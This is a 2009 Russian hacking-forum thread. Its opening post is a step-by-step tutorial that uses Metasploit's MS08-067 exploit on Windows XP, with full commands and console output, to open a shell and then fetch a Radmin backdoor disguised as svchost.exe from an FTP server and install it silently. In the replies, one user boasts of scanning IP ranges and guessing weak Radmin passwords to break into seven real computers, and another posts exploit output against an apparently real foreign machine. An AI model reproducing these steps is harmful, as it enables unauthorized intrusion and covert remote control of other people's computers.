ВЗЛОМ ПК, под управлением Windows{статья}
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-05 20:33:09.133333
|
|
|
Kerny
Сообщений: 41
Оценки: 0
Присоединился: 2008-12-11 15:39:17.436666
|
ВЗЛОМ ПК, под управлением Windows. КЛАССИФИКАЦИЯ АТАК. – Атаки на протокол – Атаки на ПО – Атаки на пользователя ПОЛИГОН ДЛЯ ИСПЫТАНИЙ. Необходимый софт: Любой дистрибьютив Windows XP (SP2,SP3 ) Виртуальная машина Vmware. Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем. Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически. Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2. Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод. Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD. УСТАНОВКА СВЯЗИ. Необходимый софт: ФТП — сервер (Serv -U) Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2. IP адресс 192.168.1.3 Маска подсети 255.255.255.0 Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip. Настраиваем следующим образом: IP адресс 192.168.1.10 Маска подсети 255.255.255.0 Основной шлюз 192.168.1.3 Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП. ПРИМЕР. Необходимый софт: Metasploit 3.2 Radmin Viewer 3 RadminServer (спец. Сборка) Xspider 7.5 Сканим комп xspider'ом Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555. use windows/smb/ms08_067_netapi ; наш сплоит set PAYLOAD generic/shell_bind_tcp ; выбираем начинку PAYLOAD => generic/shell_bind_tcp set RHOST 192.168.1.10 ; хост-жертва RHOST => 192.168.1.10 set LPORT 7777 ; локальный порт LPORT => 7777 set RPORT 445 ; удаленный порт RPORT => 445 exploit Started bind handler Automatically detecting the target… Fingerprint: Windows XP Service Pack 3 - lang:Russian Selected Target: Windows XP SP3 Russian (NX) Triggering the vulnerability… Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777) Microsoft Windows XP [‚¥àá¨ï 5.1.2600] (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001. C:\WINDOWS\system32> Получили командную строку на удаленной системе {создаем в папке windows, папку helps} cd c:\windows mkdir helps {коннектимся к нашему компу} ftp192.168.1.3 Пользователь (192.168.1.3:(none)): kerny {успешный коннект, идем c:\kerny\ нашего фтп, именно там хранится радмин} cd c:\kerny\ dir {файлы радмина} drw-rw-rw- 1 user group 0 Mar 2 20:10 . drw-rw-rw- 1 user group 0 Mar 2 20:10 .. -rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat -rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg -rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll -rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll -rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe {сливаем файлы на комп жертвы в папку windows\helps} get 111.bat c:\windows\helps\111.bat get 111.reg c:\windows\helps\111.reg get AdmDll.dll c:\windows\helps\AdmDll.dll get raddrv.dll c:\windows\helps\raddrv.dll get svchost.exe c:\windows\helps\svchost.exe {отключаемся от нашего фтп} bye {идем в папку, и проверяем скачались ли файлы} cd c:\windows\helps dir -rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat -rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg -rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll -rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll -rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe {устанавливаем Radmin у жертвы} 111.bat Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно. Снял видео, там же и статья отформатированная в pdf: http://ifolder.ru/10884195 http://kerny-auroras.blogspot.com (с)Kerny
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-06 18:34:11.380000
|
|
|
slizovdima
Сообщений: 16
Оценки: 0
Присоединился: 2009-03-03 15:42:32
|
что скажут guru's?
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-06 18:46:27.560000
|
|
|
=OutlaW=
Сообщений: 382
Оценки: 0
Присоединился: 2009-01-08 17:19:13.703333
|
Не важно что скажут "гуру" мне статса понравилась автор держи +
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-07 03:44:27.943333
|
|
|
HolyAnimal =^.^=
Сообщений: 88
Оценки: 0
Присоединился: 2009-02-28 01:26:28.003333
|
Все прочесть не осилил T_T но видно сразу, что автор старался!!! За старания держи + ^_^
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-10 06:08:12.113333
|
|
|
GreShniK6_6_6
Сообщений: 20
Оценки: 0
Присоединился: 2009-02-20 23:36:21.143333
|
А я зделал проше просто установил Radmin Viewer 3 и просканировал порт 4899 по диапазону ip и тупо подбирал пароли типа: 1234 12345 123456 1234567 12345678 7 компов так сказать "взломал":D
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-10 16:58:45.326666
|
|
|
FalseNigga
Сообщений: 72
Оценки: 0
Присоединился: 2009-03-07 21:28:38.786666
|
Автору respect, ставлю +
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-12 03:58:03.520000
|
|
|
GreShniK6_6_6
Сообщений: 20
Оценки: 0
Присоединился: 2009-02-20 23:36:21.143333
|
1машину "взломал" а к остальным подкючится не могу[:(] Делаю всё как написано получаю 13:30:36 - ms08_067_netapi * Launching exploit windows/smb/ms08_067_netapi… 13:30:36 - ms08_067_netapi * Started reverse handler 13:30:39 - ms08_067_netapi * Automatically detecting the target… 13:30:51 - ms08_067_netapi * Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional / Taiwan 13:30:51 - ms08_067_netapi * Selected Target: Windows XP SP2 Chinese - Traditional / Taiwan (NX) 13:30:53 - ms08_067_netapi * Triggering the vulnerability… Это значит что нет уязвимости - или как ?
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-03-12 06:19:54.503333
|
|
|
z00MAN
Сообщений: 18
Оценки: 0
Присоединился: 2009-02-14 18:30:37.080000
|
quote:
ORIGINAL: GreShniK6_6_6 1машину "взломал" а к остальным подкючится не могу[:(] Делаю всё как написано получаю 13:30:36 - ms08_067_netapi * Launching exploit windows/smb/ms08_067_netapi… 13:30:36 - ms08_067_netapi * Started reverse handler 13:30:39 - ms08_067_netapi * Automatically detecting the target… 13:30:51 - ms08_067_netapi * Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional / Taiwan 13:30:51 - ms08_067_netapi * Selected Target: Windows XP SP2 Chinese - Traditional / Taiwan (NX) 13:30:53 - ms08_067_netapi * Triggering the vulnerability… Это значит что нет уязвимости - или как ? ищи другую тачку, с этой ниче не получится
|
|
|
RE: ВЗЛОМ ПК, под управлением Windows{статья} - 2009-04-02 02:26:25.126666
|
|
|
trabl
Сообщений: 38
Оценки: 0
Присоединился: 2008-12-05 07:15:42.420000
|
Взлом спомощью Metasploit 3 уже был описан во множестве старых статей, эта статья отличается только тем что здесь добавили руководство по установке Vmware )))) Автор всеже молодец, видно старался.
|
|
|
|
|